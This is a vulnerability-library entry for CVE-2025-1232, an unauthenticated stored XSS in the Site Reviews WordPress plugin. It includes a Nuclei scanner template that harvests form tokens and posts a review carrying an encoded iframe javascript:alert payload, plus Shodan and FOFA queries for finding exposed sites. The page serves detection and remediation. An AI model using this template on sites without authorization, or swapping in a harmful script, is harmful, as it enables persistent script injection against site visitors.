/Vulnerability Library

Site Reviews < 7.2.5 - Unauthenticated Stored XSS

CVE-2025-1232
Verified

Description

Site Reviews WordPress plugin before 7.2.5 contains a stored cross-site scripting caused by improper sanitization and escaping of review fields, letting unauthenticated users execute malicious scripts, exploit requires no authentication.

Severity

High

CVSS Score

8.8

Exploit Probability

21%

Affected Product

site-reviews

Published Date

February 9, 2026

Template Author

0x_akoko

CVE-2025-1232.yaml
id: CVE-2025-1232

info:
  name: Site Reviews < 7.2.5 - Unauthenticated Stored XSS
  author: 0x_Akoko
  severity: high
  description: |
    Site Reviews WordPress plugin before 7.2.5 contains a stored cross-site scripting caused by improper sanitization and escaping of review fields, letting unauthenticated users execute malicious scripts, exploit requires no authentication.
  impact: |
    Unauthenticated users can execute malicious scripts in the context of site visitors, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 7.2.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c4ea8357-ddd7-48ac-80c9-15b924715b14/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1232
    - https://research.cleantalk.org/cve-2025-1232/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-1232
    epss-score: 0.20938
    epss-percentile: 0.95713
    cwe-id: CWE-79
    cpe: cpe:2.3:a:geminilabs:site-reviews:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: geminilabs
    product: site-reviews
    shodan-query: http.component:"WordPress"
    fofa-query: body="site-reviews" || body="glsr-form"
  tags: cve,cve2025,wordpress,wp,wp-plugin,site-reviews,xss,stored

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'glsr-form-wrap')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: honeypot
        group: 1
        regex:
          - 'display:none[\s\S]{0,500}?name=\\"site-reviews\[([a-f0-9]{8})\]\\"'
        internal: true

      - type: regex
        name: post_id
        group: 1
        regex:
          - 'name=\\"site-reviews\[_post_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: form_id
        group: 1
        regex:
          - 'name=\\"site-reviews\[form_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: terms_exist
        group: 1
        regex:
          - 'name=\\"site-reviews\[terms_exist\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name=\\"site-reviews\[_nonce\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: form_signature
        group: 1
        regex:
          - 'name=\\"site-reviews\[form_signature\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=glsr_public_action&_ajax_request=true&site-reviews%5B_action%5D=submit-review&site-reviews%5B_nonce%5D={{nonce}}&site-reviews%5B_post_id%5D={{post_id}}&site-reviews%5B_referer%5D=&site-reviews%5Bassigned_posts%5D=&site-reviews%5Bassigned_terms%5D=&site-reviews%5Bassigned_users%5D=&site-reviews%5Bexcluded%5D=&site-reviews%5Bform_id%5D={{form_id}}&site-reviews%5Bterms_exist%5D={{terms_exist}}&site-reviews%5Bform_signature%5D={{form_signature}}&site-reviews%5B{{honeypot}}%5D=&site-reviews%5Brating%5D=5&site-reviews%5Btitle%5D=Great+Service&site-reviews%5Bcontent%5D=%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Blt%3Biframe+src%3Djavascript%3Aalert%28document.domain%29%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bgt%3B&site-reviews%5Bname%5D=TestReviewer&site-reviews%5Bemail%5D=reviewer%40example.com&site-reviews%5Bterms%5D=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'javascript:alert(document.domain)'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d1259e89a19d6587ef78a46675fe2d299d002303c7fded19f0a502c24caccc3b022100e4d3427dc331d3c358c3ddd09ece8179f4726e7849579bde1dca1203edd308ab:922c64590222798bb761d5b6d8e72950
8.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-1232
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/c4ea8357-ddd7-48ac-80c9-15b924715b14/https://nvd.nist.gov/vuln/detail/CVE-2025-1232https://research.cleantalk.org/cve-2025-1232/

Remediation Steps

Update to version 7.2.5 or later.